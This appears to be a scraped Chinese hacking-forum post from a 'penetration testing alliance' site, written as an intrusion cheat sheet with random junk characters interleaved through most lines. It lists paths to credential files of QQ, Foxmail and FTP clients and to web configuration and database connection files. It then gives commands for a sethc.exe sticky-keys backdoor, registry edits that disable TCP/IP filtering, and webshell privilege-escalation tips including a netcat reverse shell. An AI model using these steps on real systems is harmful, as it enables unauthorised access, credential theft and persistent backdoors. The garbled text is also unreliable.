C:\Program Files\Apache Group\Apache2\bin\Apache.exe
7 k/ o9 E1 W2 v9 O, @. N/ m/usr/local/tomcat5527/bin/version.sh
$ i/ K# W& V7 b8 B2 Q/usr/share/tomcat6/bin/startup.sh
0 J6 Q2 n( z& G5 ^/usr/tomcat6/bin/startup.sh
1 P: }0 V2 Z" L$ ?* a+ @& M1 Rc:\Program Files\QQ2007\qq.exe
" {0 G5 p$ p# e& _% X2 u' N6 ic:\Program Files\Tencent\qq\User.db
c:\Program Files\Tencent\qq\qq.exe
+ }6 n( J/ ~6 o' e( Nc:\Program Files\Tencent\qq\bin\qq.exe
" p3 l- t" M7 j4 I% N8 ec:\Program Files\Tencent\qq2009\qq.exe
c:\Program Files\Tencent\qq2008\qq.exe
c:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
) X7 r7 H' G$ t- Kc:\Program Files\Tencent\RTXServer\AppConfig.xml
8 T/ m, l3 |. N( K' Y: s7 SC:\Program Files\Foxmal\Foxmail.exe
9 [) }1 \* d, m# d0 |1 vC:\Program Files\Foxmal\accounts.cfg
C:\Program Files\tencent\Foxmal\Foxmail.exe
C:\Program Files\tencent\Foxmal\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
. K7 H" v2 e1 c( KC:\Program Files\FlashFXP\FlashFXP.ini
C:\Program Files\FlashFXP\flashfxp.exe
1 i% T# r- x& A# oc:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
  h9 }* T8 @( HC:\Program Files\StormII\Storm.exe
6 w1 Y. L7 u( d/ \
7 b$ v& ^& n7 l" ]2 Y1 x) }$ P3.网站相对路径:
/ ^7 ]+ B) V$ B9 M9 [/ |% `+ d( g* {2 C0 x
1 P6 u6 o8 c" H9 D/config.php
../../config.php
3 K' {1 o" ?% A9 J! F7 S../config.php
0 E: q7 L) I# B) U. [0 ~2 I../../../config.php
/config.inc.php
./config.inc.php
8 n" D! Q7 c$ U. U7 u4 `, j' m../../config.inc.php
  W# z' T5 u% n' u/ D* }/ B+ E# {../config.inc.php
- R' b% W: u) L1 i! d+ B$ S../../../config.inc.php
/conn.php
./conn.php
../../conn.php
# e' _! z6 A( p+ s1 Y' |* y5 A../conn.php
../../../conn.php
/conn.asp
./conn.asp
../../conn.asp
../conn.asp
8 o* Q" N0 b% M) ~../../../conn.asp
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
6 W1 @5 t, q. r! h4 B/config/config.php
../../config/config.php
. M3 y" F% p2 X7 R../config/config.php
3 Q, S& v3 B' J2 ^# g& C../../../config/config.php
8 [, g4 f% |1 ?8 Z8 d( z/config/config.inc.php
./config/config.inc.php
( h& l' n1 _+ J0 Z( J8 f- S../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
7 s. I* B# P; b( b. V, A/ z+ I* S/config/conn.php
./config/conn.php
! a% r; S; `& M) ?2 Z, o/ W../../config/conn.php
../config/conn.php
../../../config/conn.php
/config/conn.asp
% r+ z% ~( g1 f2 ?/ M6 g./config/conn.asp
' _2 O; b7 [7 N../../config/conn.asp
% F; R/ |4 e5 b" u4 z../config/conn.asp
' }+ m$ \1 P- G6 _5 d1 L4 t% F../../../config/conn.asp
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
5 b: @) j/ v& g$ R! g/data/config.php
! V7 Y+ N3 c3 X1 I  V0 L! Z& U3 Q1 I../../data/config.php
../data/config.php
../../../data/config.php
/data/config.inc.php
: v  Y! g" t+ v  b7 r# T: y./data/config.inc.php
6 s% H3 b7 {) c1 @; L/ N../../data/config.inc.php
4 u6 w1 y7 l# Z2 ~3 Z; ~$ `../data/config.inc.php
/ o/ @3 k. @. ^. P" @* j% p' m0 O../../../data/config.inc.php
: k1 s0 Y2 ~% s/data/conn.php
3 f0 h. r6 `8 b& s2 t8 w./data/conn.php
: U/ j0 ?+ Q4 Q3 C7 z../../data/conn.php
7 _0 Z9 v4 B$ F../data/conn.php
../../../data/conn.php
/data/conn.asp
/ m+ j8 P' O. ^. k8 z" p1 W./data/conn.asp
../../data/conn.asp
../data/conn.asp
$ X( S9 c9 m% L6 {/ U- x) Z& o7 F8 }../../../data/conn.asp
0 E  b# @# U9 }- L2 U4 g; D" a& }/data/config.inc.php
+ P1 A5 w8 _* }! q/ E1 L8 E% _./data/config.inc.php
! {6 O+ ^0 P. [) Q& E../../data/config.inc.php
4 b4 m3 F, F; y% P$ j; i../data/config.inc.php
../../../data/config.inc.php
/include/config.php
../../include/config.php
../include/config.php
../../../include/config.php
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
5 r) R# z! V% T1 ~8 \../include/config.inc.php
../../../include/config.inc.php
- M- y" z; Y$ m& e5 P; ^5 C0 ]+ u/include/conn.php
+ m& A' D% m3 Y6 }5 F7 o./include/conn.php
1 k8 Y* J( X/ E% L5 c* O../../include/conn.php
! }. w" b" z( s4 c. H# Y../include/conn.php
../../../include/conn.php
/include/conn.asp
: X2 ~: W  k. Z./include/conn.asp
+ W0 D6 S6 }, c* \; E../../include/conn.asp
../include/conn.asp
  z9 V$ \, a; h- a% E5 C../../../include/conn.asp
- }% [% G9 ?! A- J% r/include/config.inc.php
, }) P2 `% w) U) L./include/config.inc.php
" z& l% c7 D* x+ q5 ]* [../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/inc/config.php
../../inc/config.php
../inc/config.php
5 X: x) ^+ r  W' R6 N4 v../../../inc/config.php
/inc/config.inc.php
1 @5 p' ^+ y6 d" R/ F' o./inc/config.inc.php
4 N7 h: A/ c( b) d" {, K* b../../inc/config.inc.php
../inc/config.inc.php
; T; G/ x0 D/ V9 T8 f0 p../../../inc/config.inc.php
/inc/conn.php
3 z: \. V+ w: R/ R( X./inc/conn.php
$ {, h4 x; s/ q( `# _../../inc/conn.php
$ M9 P' y" N0 S. U3 t../inc/conn.php
../../../inc/conn.php
1 Y3 h! U2 j# J1 W/ H* ]6 D/inc/conn.asp
3 d$ K( j; A& F/ Y; E2 @./inc/conn.asp
  b; R# f- W/ c0 W+ B* A../../inc/conn.asp
7 K( K2 ^" {- [8 I6 M( W/ F../inc/conn.asp
, K' x3 ^6 Q5 Q' W- o; H$ v../../../inc/conn.asp
9 ~4 c1 f+ v0 n' W1 E+ Q/inc/config.inc.php
2 p1 U1 m; ?; o5 w$ Q( d4 o./inc/config.inc.php
../../inc/config.inc.php
  A  P! y; f& p. O% Y../inc/config.inc.php
" W- ?' w- d3 `* J, V* G8 \../../../inc/config.inc.php
7 P6 j# d5 U2 ~# O: q4 l4 D: p/index.php
./index.php
../../index.php
../index.php
' e- F" {' j# I: Z- j: R../../../index.php
) x% F2 q- g* c, }/index.asp
./index.asp
9 M6 u, j' L/ T: G# r" Q../../index.asp
/ O: _3 X* ?  R. b8 h4 i../index.asp
../../../index.asp
替换SHIFT后门
0 u- I7 N5 N* i　attrib c:\windows\system32\sethc.exe -h -r -s

　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
8 w# D! x" q1 y& y
　　del c:\windows\system32\sethc.exe
; g. Y- I! Z7 W- M+ f
　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
: o, q  L# i, r! X3 m5 |! y
　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
5 ?6 L; a* d- Z, C; r6 ]4 [+ \- G& s
, r$ T0 Z( F# s- W　　attrib c:\windows\system32\sethc.exe +h +r +s

8 o$ Q- W) |: ]5 r4 h) O6 O　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
- e, ?" v* w1 {  }去除TCPIP筛选
; Y0 t0 @9 U* H- hTCP/IP筛选在注册表里有三处，分别是：
+ `. _, g( Y+ {HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
+ H. X+ }  \6 @6 C; k* |4 mHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ U0 T: V0 }/ X/ nHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

# W: K1 u9 c$ w& s9 [% M分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 m4 {& c$ U9 O. g2 E% I- V3 a3 Vregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
1 O% [' u* t/ u/ e
然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000

/ u' R& Y, ~, Q0 e2 \! M2 |- e- d再将以上三个文件分别用
regedit -s D:\a.reg
; a4 `. v7 u2 ^  R5 D3 ^: J0 J: p! Eregedit -s D:\b.reg
regedit -s D:\c.reg
导入注册表即可
; X  v) q% k/ H( J% W$ K8 f
webshell提权小技巧
cmd路径:
9 D5 d. {4 m& Zc:\windows\temp\cmd.exe
7 L/ s: A/ i2 O9 L8 e1 Inc也在同目录下
例如反弹cmdshell：
* g2 S6 m, q+ k. E"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不会成功。

而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
6 U, }, D  c* V! F命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
这个不是重点
2 v/ B+ |) R( `& \" \我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2